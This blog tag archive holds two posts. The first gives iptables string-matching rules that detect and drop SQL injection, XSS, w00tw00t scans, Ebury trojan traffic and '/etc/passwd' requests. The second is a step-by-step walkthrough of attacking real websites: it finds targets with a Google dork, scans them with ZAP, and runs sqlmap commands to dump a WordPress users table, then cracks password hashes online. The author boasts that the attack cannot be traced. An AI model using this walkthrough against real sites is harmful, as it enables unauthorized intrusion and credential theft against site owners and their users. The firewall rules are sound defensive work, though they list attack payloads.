Tag Archive: sql injection


IPtables is not an ordinary firewall unless and until not used properly.

Their are cases where security analysts do not have an option to play with hardware firewall or sometime no access to DC, mainly cpanel servers.

In this case, the only option is customized solution, one of the kind is shown below,

iptables

 

with iptables string matching, you can achieve the highest security possible with log scanning if anything bypasses firewall.

This is mainly IPS/IDS dependent upon the signature matching.

  1. Create a chain, say “woot”
  2. After all the input rules, goto woot chain for additional checks.
  3. then specify malicious signatures to detect different types of attacks.
  4. If matches then first log the packet and then drop.

your iptables file should be something like below,

:INPUT ACCEPT [2404:336622]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [2359:257349]
:LOGGING – [0:0]
:w00t – [0:0]

-A INPUT -i lo -j ACCEPT
-A INPUT -s 127.0.0.1 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp –dport 22 -j ACCEPT
-A INPUT -s x.x.x.x -p tcp -m tcp –dport 22 -j ACCEPT

-A INPUT -p tcp -j w00t

-A OUTPUT -p tcp -m tcp –dport 53 -m string –hex-string “|120b01000001|” –algo bm –to 65535 -j LOG –log-prefix “Ebury SSH Rootkit:” –log-level 7
-A OUTPUT -p tcp -m tcp –dport 53 -m string –hex-string “|120b01000001|” –algo bm –to 65535 -j DROP

-A w00t -p tcp -m string –string “w00tw00t.at.ISC.SANS” –algo bm –to 65535 -j LOG –log-prefix “w00tw00t detected:” –log-level 7
-A w00t -p tcp -m string –string “w00tw00t.at.ISC.SANS” –algo bm –to 65535 -j DROP

The above will first log packets (chain woot), and then drop it.

Log:

Apr 14 20:19:29 darkwizz kernel: w00tw00t detected:IN=eth0 OUT= MAC=00:30:48:8f:49:c9:01:24:00:08:00 SRC=x.x.x.x DST=96.31.85.162 LEN=86 TOS=0x00 PREC=0x00 TTL=115 ID=10415 DF PROTO=TCP SPT=59420 DPT=80 WINDOW=256 RES=0x00 ACK PSH FIN URGP=0

Test Scenarios:

1. open a command line and type in,

nc -l 5501

2. open another session of that server

telnet server-ip 5501

from telnet command line,

test

3. first session where you typed in nc command, you’ll see “test” appearing on that session

4. from second terminal (point 2), type in  “w00tw00t”

5. string won’t appear on first session and then consequent packets will be dropped from that server.

6. check the logs and you will see.

Where to find the log location for iptables?

cat /etc/syslog.cong

kern.*                        /var/log/firewall.log

Back to our firewall rules,

their is outbound traffic from server getting dropped if it matches a hex-string, “120b01000001” which is a string for Ebury Trojan.

you can easily convert any snort rules into IP table rules.

Some Rules according to types of attacks,

1. SQL Injection Attacks: 

The “%27or%271%27%3D%271” was an encoding. When decoding the URL, it would result as a message ‘ or ‘1’=’1.

-m string –string  “%27+or+%271%27%3d%271”

“%27+or+1%3d1”

“%27+or+%271%27%3d%271”

“%27)+or+%27%27%3d%27”

“%27)+or+1%3d1”

“%27)+or+%271%27%3d%271”

“%27)+or+(%27%27%3d%27”

“%27)+or+(1%3d1”

“%27)+or+(%271%27%3d%271”

2. Buffer Overflow Exploits

-m string –string “AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”

Recently I posted “http://ustechnica.com/category/security/wordpress-arbitrary-file-download-and-file-deletion-exploit/”

and was able to download /etc/passwd file, you can even match this string and drop the request.

3. Arbitrary File download

-m string –string “/etc/passwd”

4. Cross Site Scripting

-m string –string %3C%73%63%72%69%70%74%3E”

-m string –string “<script>”

you just need to convert all snort rules to iptables, below is the good reference can be used,

Ref:

ftp://ftp.itb.ac.id/pub/ISO-IMAGES/linux/filenya-putu-shinoda/bukulinux/LinuxFirewall-Attack%20Detection.pdf

http://www.bandwidthco.com/sf_whitepapers/firewalls/IPTables%20Linux%20Firewall%20with%20Packet%20String-matching%20support.pdf

MySQL Injection attack

I was too curious with MySql Injection (a common vulnerability found in many websites), I started learning about it and tried to exploit couple of test websites.

After couple of tests run, Exploited in a manner that can’t be traced back.

I won’t be going with more details but will directly jump on to exploit one of the website.

For detailed theory and explanation, Ref: http://securityoverride.org/articles.php?article_id=1

Step 1. Google Dork for MySql injection,

inurl=category.php?id= site:com.au (This will list all the websites having category.php?id= in url for Australian sites.)

dork

you can refer to good links of Google Dorks for different kind of attacks,

http://www.exploit-db.com/google-dorks/

Joomla: http://www.hackerbradri.com/2012/07/google-dorks-for-jamoola.html

SQLi – RFI – LFI – Joomla http://pastebin.com/92rkBSps

WordPress: http://newexploits.com/wordpress/tag/google-dork/

Step 2: Information Gathering, Scanning

Since you have decided upon your target, we need to gather information about the target.

Information Gathering is the most important base line on which your entire POA (Plan Of Action) is depend upon.

Here I am using OWASP ZAP framework 2.0.0, Installation is pretty much straight forward. BackTrack/Kali comes with default installation of Zap.

In windows, keep clicking and installation is done. 😛 :).

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

owasp1

owasp2

After the scanning, we got 2 vulnerabilities.

  • Cross Site Scripting
  • SQL Injection (Union Based)

step 3: Exploit the loop holes.

I’ve used SQLMap here,

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

http://sqlmap.org/

This will fetch all the DBs and will also check whether the URL is vulnerable to SQL injection.

Once done, say you have the DB, as e3xample_db. Let’s further exploit to fetch the tables.

inject1

inject2

  • Select the table and fetch the information pertaining to that table.

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users –column

we will get the names of columns in that table with datatype

  • Exploiting further,

./sqlmap.py -u http://www.example.com.au/category.php?cat_id=1 -D example_db -T wp_users -C ID,user_email,user_login,user_pass –dump

inject3

inject4

It’s done, Hacked with Password.

inject5

From the Above Snag, we couldn’t cracked the First entry.

Let’s try it online, 🙂

http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php

inject6

Cheers!!!!!!!!!!!!!!! 🙂